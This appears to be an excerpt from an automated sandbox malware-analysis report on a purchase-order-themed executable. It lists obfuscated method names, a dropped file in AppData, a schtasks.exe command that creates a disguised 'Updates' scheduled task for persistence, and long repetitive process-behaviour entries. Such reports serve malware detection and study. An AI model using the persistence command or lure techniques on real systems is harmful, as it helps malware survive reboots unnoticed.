Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, CNf4aiufShEXHyEDKN.cs	High entropy of concatenated method names: 'XYT8RcPDQ3', 'VTr8fAol7F', 'x4t8YZu38E', 'lnq8AeNnCq', 'Jri8UNfYtO', 'LXl8S8iAYF', 'KKG8WwgtQr', 'VbP87YxjGC', 'ipm8XpRHJn', 'Qig81OEUMD'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, LUHUJtC4cJe22u8xUo.cs	High entropy of concatenated method names: 'zMEYccKRmm', 'WSRYKPTpW7', 'YCjYrYQlpK', 'aYSYCSSI6K', 'OrWYL0c3Zq', 'yMqYTQOFhF', 'CrVYebT4Ne', 'XI7Y8Qpa89', 'AOHYGPWKQ9', 'rI5YMp7Fqi'
Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, Bl.cs	High entropy of concatenated method names: 'ee', 'Bq', 'YC', 'Nc', 'g4', 'Yo', 'ry', 'TP', 'TO', 'pM'
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, Bl.cs	High entropy of concatenated method names: 'ee', 'Bq', 'YC', 'Nc', 'g4', 'Yo', 'ry', 'TP', 'TO', 'pM'

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

File created: C:\Users\user\AppData\Roaming\VvtddClQv.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
